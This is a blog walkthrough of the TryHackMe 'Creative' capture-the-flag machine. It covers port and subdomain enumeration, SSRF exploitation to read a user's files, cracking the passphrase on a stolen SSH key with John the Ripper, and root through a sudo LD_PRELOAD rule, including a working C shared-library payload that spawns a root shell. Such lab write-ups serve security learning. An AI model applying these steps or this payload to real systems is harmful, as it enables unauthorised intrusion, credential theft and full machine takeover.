Creative: A THM box (Walkthrough)
This CTF challenge demonstrated a variety of techniques, from basic enumeration to advanced privilege escalation. Each step built upon the last, highlighting the importance of thorough enumeration and creative problem-solving in penetration testing. By following this process, you can develop a strong methodology for approaching similar challenges in the future.
In this blog post, I will walk you through the steps taken to exploit a machine in a Capture the Flag (CTF) challenge. This journey begins with basic enumeration and culminates in privilege escalation, allowing full control over the target machine. We'll cover each step, including commands and tools used, to give you a comprehensive understanding of the process.
1. Initial Enumeration with Nmap
The first step in any penetration test or CTF challenge is enumeration. Here, we start with an Nmap scan to identify open ports and services on the target machine.
nmap -sC -sV $IP -vv
-sC: Runs default Nmap scripts.-sV: Detects service versions.-vv: Provides verbose output.
The scan reveals two open ports:
- 22: SSH
- 80: HTTP
With these two ports identified, we proceed to investigate the HTTP service on port 80.
2. Exploring the HTTP Service on Port 80
Navigating to port 80 in a web browser reveals a website. This is often a good entry point, so we try to enumerate the website’s directories and files using `dirb`, a common web content scanner.
dirb http://$IP
However, `dirb` doesn’t return any significant results, indicating that either the content is well-hidden or `dirb` is not using an adequate wordlist. This prompts us to explore further.
3. Subdomain Enumeration with FFUF
When `dirb` fails, it's time to try a different approach. Subdomain enumeration can often reveal hidden areas of the site. We use `ffuf`, a fast web fuzzer, to discover subdomains.
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://creative.thm/ -H "Host:FUZZ.creative.thm" -fw 6-w: Specifies the wordlist.-u: Defines the target URL.-H: Sets a custom header (`Host:FUZZ.creative.thm`).-fw 6: Filters out results with six-word responses.
After running `ffuf`, we discover a subdomain: `beta.creative.thm`.
4. Accessing the Beta Subdomain
Navigating to `beta.creative.thm` reveals a URL tester application. These types of applications are often vulnerable to Server-Side Request Forgery (SSRF), which allows an attacker to make requests from the server itself.
5. Identifying Internal Services with SSRFMap
To exploit the SSRF vulnerability, we use a tool called SSRFMap. This tool can automate the discovery of internal services that might be exposed within the network.
ssrfmap -u http://beta.creative.thm/urltester -p url
Running SSRFMap reveals that port 1337 is open internally.
6. Gaining Access to User Files
With knowledge of the internal port 1337, we attempt to access it using SSRF to list the contents of directories. This eventually leads us to the directory of a user named `saad`.
We find and submit the user.txt flag located at /home/saad/user.txt to gain the initial foothold in the challenge.
7. Extracting the SSH Private Key
In the same directory, we find id_rsa under .ssh folder, Saad's SSH private key. To use this key, we first copy it to our attack box and modify its permissions.
chmod 600 id_rsa
Upon trying to use the key, we discover it is password-protected. To crack the password, we first convert it into a format that John the Ripper can understand.
8. Cracking the SSH Key Password with John the Ripper
We use `ssh2john` to create a hash of the password-protected SSH key.
ssh2john id_rsa > hash.txt
Then, we use John the Ripper to crack the password.
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
John successfully cracks the password, which we then use to SSH into the machine as Saad.
9. Privilege Escalation to Root
Once logged in as saad, we check his .bash_history file for any useful information. Luckily, we find Saad’s password stored in plain text.
Using this password, we run sudo -l to check what commands Saad can run as root.
sudo -l
During our enumeration of Saad's sudo privileges, we discovered that Saad can run the /usr/bin/ping command as root. Additionally, we noticed the environment variable env_keep+=LD_PRELOAD is set, which allows us to load a custom shared library when executing the ping command.
The LD_PRELOAD environment variable can be exploited to run arbitrary code with elevated privileges. To do this, we need to create a shared library that, when loaded, spawns a root shell.t.
10. Compiling and Executing the Shared Library
To exploit this, we write a simple C program to spawn a shell with root privileges.
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
We compile the program into a shared library.
gcc -o /tmp/root.so -shared -fPIC /tmp/root.c
Finally, we execute the shared library to gain a root shell.
sudo LD_PRELOAD=/tmp/root.so /usr/bin/ping
This command gives us root access, allowing us to take full control of the machine.
Comments